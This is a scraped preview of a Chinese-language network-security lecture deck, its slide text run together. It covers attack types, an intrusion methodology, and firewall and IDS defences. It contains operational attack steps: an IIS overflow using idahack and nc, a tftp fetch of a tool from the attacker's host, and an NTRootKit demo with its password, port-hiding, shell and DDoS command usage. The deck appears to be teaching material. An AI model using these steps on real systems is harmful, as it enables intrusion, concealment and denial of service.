網(wǎng)路安全概論_第1頁(yè)
網(wǎng)路安全概論_第2頁(yè)
網(wǎng)路安全概論_第3頁(yè)
網(wǎng)路安全概論_第4頁(yè)
網(wǎng)路安全概論_第5頁(yè)
已閱讀5頁(yè),還剩46頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶(hù)提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

網(wǎng)路安全概論傳世

為您整理1Agenda內(nèi)容大綱資訊安全概論防火牆&IDS,IPS基本網(wǎng)路障礙排除無(wú)線網(wǎng)路安全Q&A2資訊安全概論常見(jiàn)的攻擊行為病毒與蠕蟲(chóng)(Worm)攻擊後門(mén)程式與特洛伊木馬IPSpoofing(IP偽造)DOS,DDOS(阻斷攻擊)駭客入侵流程分析駭客入侵九大步驟入侵防治3常見(jiàn)攻擊行為(1)Virus&Worm攻擊CodeRed,Nimda,SQLSlammerBlasterBackdoor&Trojan惡意網(wǎng)頁(yè)popup程式病毒郵件peep.exe&peepbrowser.exewin.ini、system.ini、系統(tǒng)服務(wù)、registry4常見(jiàn)攻擊行為(2)IPspoofing–IP假造攻擊mendasipspoofhuntDOS&DDOS拒絕服務(wù)攻擊SYNFlood5DDOS攻擊示意圖6駭客入侵流程分析資料蒐集目標(biāo)掃描弱點(diǎn)刺探取得初步權(quán)限提昇權(quán)限進(jìn)行破壞建立後門(mén)隱藏蹤跡、消滅證據(jù)癱瘓目標(biāo)71.資料蒐集:找出可供入侵的資源網(wǎng)頁(yè)拜訪WhoisInterNICTWNIC()NetworkSolutions社交工程DNSzonetransfernslookuptracerouteortracert82.目標(biāo)掃描ToolsPingNmapSuperScanAdvancedipscannerAdvancedportscannerIcmpenumNetScanToolPro2000NetcatStrobe93.弱點(diǎn)刺探網(wǎng)路資源與分享Netview,nbtstat,nbtscan,nltest,Legion,…使用者與群組探查nbtscannbtstat,enum遠(yuǎn)端登入程式telnet,vnc,terminalservice,pcanywhere10收集資訊目的偵測(cè)目的網(wǎng)路的所有主機(jī)偵測(cè)目的所提供服務(wù)判斷目的主機(jī)服務(wù)種類(lèi)(bannergrabbing)判斷目的主機(jī)之作業(yè)系統(tǒng)(OSguessing)DNS區(qū)域資料Windows網(wǎng)域之NetBIOS名稱(chēng)及DCWindows相關(guān)資料,如user、group、網(wǎng)卡數(shù)量、通訊協(xié)定。114.進(jìn)行滲透:取得初步權(quán)限密碼猜測(cè)不安全的密碼NTIS(空白密碼)administrator,adm,test….字典攻擊法SMBCrackLegion,NetBIOSAuditionTool,…網(wǎng)路監(jiān)聽(tīng)cain緩衝區(qū)溢位(BufferOverflow)攻擊IIS12緩衝區(qū)溢位(BufferOverflow)攻擊IISida溢出漏洞的攻擊工具:t,idahack,nc,whoami步驟:Startt進(jìn)入命令提示字元模式,並切換至idahack所在目錄輸入“idahack

欲攻擊目標(biāo)IP欲攻擊目標(biāo)之IISport欲攻擊目標(biāo)OSversion代碼欲開(kāi)啟之連接portNc

欲攻擊目標(biāo)IP由idahack所開(kāi)啟之portIpconfig/all/*確認(rèn)攻擊成功*/Cd\Tftp–I發(fā)動(dòng)攻擊HOST之IPgetwhoami.exeWhoami/*確認(rèn)目前的使用者帳號(hào)*/135.提昇權(quán)限密碼猜測(cè)網(wǎng)路監(jiān)聽(tīng)密碼檔破解工具Tools:pwdump2,L0phtCrack,John將使用者加入管理者群組getadmin,Sechole鍵盤(pán)敲擊記錄KeyloggerTofindProtectedStorageServiceincludingpasswordsfore-mailaccountsinMicrosoftOutlook,MicrosoftOutlookExpress,MSNMessenger,savedInternetExplorerformdata.ProtectedStorageExplorerProtectedstoragepassview146.進(jìn)行破壞竊取破壞置換網(wǎng)頁(yè)刪除資料跳板攻擊攻擊知名企業(yè)或政府單位157.建立後門(mén)啟動(dòng)的操控HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion,\Run,\RunOnce,\RunOnceEx,\RunServices遠(yuǎn)端控制TelnetserviceVNC,Terminalservices,pcanywhere168.隱藏蹤跡、消滅證據(jù)關(guān)閉稽核清除記錄Elsave,ClearLogs,ClearIIsLog隱藏檔案Attrib隱藏至NTFS:sfindWin2k支援,WinXP,Win2003不支援LNS:ListNTFSStreams

使用rootkit17使用rootkitTool:NTRootKit可隱藏自身及所開(kāi)的port,工作管理員,netstat–an看不到??蛇M(jìn)行DDOS攻擊18NTRootKit攻擊演示Victim:Attracker:0在被攻擊端電腦(Victim)執(zhí)行ntrootkit在攻擊端電腦執(zhí)行nc445!!!PASSWORDyyt_hac111出現(xiàn)訊息:Welcometoyyt_hac'sntrootkitServer1.22version,use'?'commandtogetcommandlistCMD>?CMD>getsysinfoCMD>hidetcpport135:隱藏TCPport135CMD>hideudpport135:隱藏UDPport135CMD>openshellC:\>dirC:\>exitCMD>exit出現(xiàn)訊息:exitsuccessfully19攻擊結(jié)果checkNetstat–an使用fport或Activeport看TCP、UDP135是否開(kāi)啟使用工作管理員或Taskinfo看是否顯示ntrootkit程式查看服務(wù)清單,是否顯示相關(guān)程式服務(wù)啟動(dòng)20使用ntrootkit

進(jìn)行DDOS攻擊usage:rtclientdestip[-ppassword][-tproto][-oport][-yicmp_type][-dicmp_code][-mMTU][-cCommand]destip-------------Thecomputeryouwanttoconnectpassword-----------Thentrootkit'spasswordproto--------------Theprotothatntrootkitwilluse(0:userdefined,1:icmp,2:udp,3:tcp)port---------------Thedestudportcpportwhichsendpacketto(defaultis445MTU----------------TheMAXpacketsizethentrootkitwillusetosendpacketicmp_type----------Theicmppackettypewhichsendtoserver,defaultisICMP_ECHOREPLYicmp_code----------Theicmppacketcodewhichsendtoserver,defaultis0Command------------ThecommandwhichyouwanttheservertodoTheDDoscommandusage:DDOSDDos_Destip[DDos_DestportDDos_typeDDos_secondsDDos_ProcCount]DDos_Destip--------ThecomputeryouwanttoDDosDDos_Destport------TheDestportyouwanttoDDos(defaultis445)DDos_type----------TheDDostypeyouwanttouse(0:pingflood,1:udpflood,2:synflood,3:mstreamflood,defaultis0)DDos_seconds-------ThesecondsyouwanttoDDosthedest(defaultis150s)DDos_ProcCount-----Theprocesscountwhichtheserverusetoddos(defaultis10)Example:rtclient-pyyt_hac-t1-cddos139230020219.癱瘓目標(biāo)阻斷服務(wù)SYNFloodIPSpoofingDDOS郵件炸彈ToolsPingofdeath、land、teardrop、mailbomb、spammail22入侵防治制定安全政策定期系統(tǒng)更新安全網(wǎng)路通訊協(xié)定定期檢查與稽核安全設(shè)備防衛(wèi)基本快速發(fā)現(xiàn)及移除惡意程式方法預(yù)防勝於治療-談如何防範(fàn)入侵23制定安全政策使用者帳號(hào)密碼原則密碼長(zhǎng)度有意義字集資料備份異地備援機(jī)房保全設(shè)施監(jiān)視設(shè)備24定期系統(tǒng)更新系統(tǒng)與程式最小安裝與設(shè)定關(guān)閉未使用的網(wǎng)路服務(wù)iptables安裝安全修正程式Windowsupdateapt-yumup2date25安全網(wǎng)路通訊協(xié)定資料加密(DataEncryption)DES,3DES,RSA認(rèn)證(Authentication).htaccessCGI程式稽核(Auditing)EX.TCPWRAPPER,SSH,SSL,KERBEROS,PEM(PrivacyEnhancedMail),VPN26安全設(shè)備防衛(wèi)安裝安全防護(hù)程式防毒/掃毒程式防火牆入侵偵測(cè)系統(tǒng)-IDS入侵防禦系統(tǒng)-IPS27定期檢查與稽核syslog病毒掃描portscan木馬/後門(mén)程式掃描Ad-AwareSEPersonal具有後門(mén)程式掃描及個(gè)人隱私記錄反追蹤移除:可幫助使用者定期掃瞄自己電腦中是否有惡意程式、告程式的存在,並且讓使用者可以輕鬆移除一些記錄使用者瀏覽網(wǎng)頁(yè)動(dòng)作的cookie系統(tǒng)網(wǎng)路設(shè)備弱點(diǎn)掃描28基本快速發(fā)現(xiàn)及移除惡意程式方法開(kāi)啟cmd.exe,輸入利用「netstat-an-ptcp」指令清查異常對(duì)外通訊的應(yīng)用程式。檢查登錄編輯器(Registry):清查HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run等自動(dòng)啟動(dòng)路徑。檢核微軟系統(tǒng)目錄中(路徑大多為C:\WINNT\SYSTEM32\)是否存在下列異常檔案。重新開(kāi)機(jī)並注意電腦對(duì)外通訊情形。

29Why防火牆什麼是防火牆為什麼需要防火牆防火牆如何管制30Firewall種類(lèi)封包過(guò)濾防火牆-PacketfilteringFirewall

效能好易建置Cost低代理伺服器防火牆-ProxyFirewall

狀態(tài)檢驗(yàn)式防火牆-StatefulInspectionFirewall

31Firewall種類(lèi)封包過(guò)濾防火牆-PacketfilteringFirewall

代理伺服器防火牆-ProxyFirewall

成本高效能差最安全狀態(tài)檢驗(yàn)式防火牆-StatefulInspectionFirewall

32Firewall種類(lèi)封包過(guò)濾防火牆-PacketfilteringFirewall

代理伺服器防火牆-ProxyFirewall

狀態(tài)檢驗(yàn)式防火牆-StatefulInspectionFirewall

效能較好有最大的擴(kuò)展及延伸能力安全性高為現(xiàn)行防火牆主流33防火牆架構(gòu)Routing-路由模式NAT-來(lái)源位址轉(zhuǎn)換模式節(jié)省IPAddress隱藏PrivateIPTransparent-透通模式簡(jiǎn)易網(wǎng)路架構(gòu)變動(dòng)最少34防火牆設(shè)定程序前置階段評(píng)估單位安全需求擬定安全策略購(gòu)買(mǎi)經(jīng)費(fèi)?建置階段完成階段35防火牆設(shè)定程序前置階段建置階段公司ServerIP及開(kāi)放服務(wù)列表ServerLocation決定架構(gòu)完成階段36防火牆設(shè)定程序前置階段建置階段完成階段驗(yàn)證policy製作操作手冊(cè)37SecurityPolicy安全政策的調(diào)校

組織單位網(wǎng)路環(huán)境完整熟析Policy愈簡(jiǎn)潔愈好PolicyLoadingMatch優(yōu)先順序38防火牆進(jìn)階應(yīng)用Radius,Kerberos等認(rèn)證虛擬私人網(wǎng)路(VPN)叢集負(fù)載平衡等功能防範(fàn)入侵和蠕蟲(chóng)攻擊39選購(gòu)Firewall須注意事項(xiàng)符合企業(yè)組織需求?安全性?建置成本?管理功能?執(zhí)行效率及效能?擴(kuò)充性?事件紀(jì)錄和警告?附加其他的事件報(bào)告軟體?40防火牆的限制易成架構(gòu)上之瓶頸無(wú)法管制內(nèi)部使用者破壞行為無(wú)法有效阻止開(kāi)後門(mén)的行為無(wú)法有效阻止針對(duì)作業(yè)系統(tǒng)漏洞進(jìn)行的入侵行為防火牆不提供資料完整性驗(yàn)證的功能41入侵偵測(cè)系統(tǒng)的基本組成監(jiān)控方法-資訊來(lái)源主機(jī)型(host-based,HIDS)網(wǎng)路型(network-based,NIDS)分析架構(gòu)反應(yīng)機(jī)制42入侵偵測(cè)系統(tǒng)的基本組成監(jiān)控方法(資訊來(lái)源)分析架構(gòu)Signature-BaseD

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶(hù)所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶(hù)上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶(hù)上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶(hù)因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論